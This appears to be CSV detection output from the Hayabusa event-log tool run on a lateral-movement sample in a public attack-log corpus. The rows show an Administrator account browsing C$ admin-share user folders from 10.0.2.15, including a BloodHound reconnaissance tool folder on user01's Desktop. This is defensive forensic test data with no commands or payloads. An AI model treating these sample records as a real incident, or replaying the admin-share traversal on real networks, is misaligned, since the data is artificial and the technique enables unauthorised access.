2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
